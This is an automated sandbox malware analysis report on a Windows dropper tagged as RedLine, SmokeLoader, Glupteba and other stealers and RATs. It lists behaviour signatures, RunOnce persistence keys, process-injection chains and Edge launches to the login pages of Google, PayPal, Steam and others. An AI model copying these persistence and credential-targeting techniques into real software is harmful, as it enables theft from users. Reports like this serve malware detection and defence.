Malware Analysis Report

2024-12-08 01:13

Sample ID 231111-mdf88add6s
Target NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe
SHA256 2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0
Tags glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan
Score 10/10

Analysis Overview

score
10/10

SHA256

2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0

Threat Level: Known bad

The file NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan

Glupteba

Detect Mystic stealer payload

SectopRAT payload

Mystic

Glupteba payload

RedLine payload

SectopRAT

SmokeLoader

RedLine

ZGRat

Detect ZGRat V1

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

AutoIT Executable

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 10:20

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 10:20

Reported

2023-11-11 10:23

Platform

win10v2004-20231023-en

Max time kernel

80s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe"

Signatures

Detect Mystic stealer payload

Detect ZGRat V1

Glupteba

loader dropper glupteba

Glupteba payload

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

SectopRAT

trojan rat sectoprat

SectopRAT payload

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\214C.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AD.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe N/A

AutoIT Executable

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FA89.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2924 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
PID 2924 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
PID 2924 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
PID 3432 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
PID 3432 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
PID 3432 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
PID 1656 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
PID 1656 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
PID 1656 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
PID 4524 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 180 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 180 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3284 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3284 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 180 wrote to memory of 3928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 180 wrote to memory of 3928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1936 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1936 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4444 wrote to memory of 4724 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4444 wrote to memory of 4724 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3848 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3848 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3156 wrote to memory of 3088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3156 wrote to memory of 3088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2468 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2468 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4000 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4000 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3988 wrote to memory of 3956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3988 wrote to memory of 3956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,3044931681823620667,12414061407216790580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,10790248111191077607,10303531561963982845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,10790248111191077607,10303531561963982845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,701871821419763544,18307310049354167736,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,701871821419763544,18307310049354167736,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,3044931681823620667,12414061407216790580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1780,1017667590340143429,12848925900103415440,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1780,1017667590340143429,12848925900103415440,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,5721535188051344480,17370459632319772641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,5721535188051344480,17370459632319772641,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,4219469405257606188,1988454598763064376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

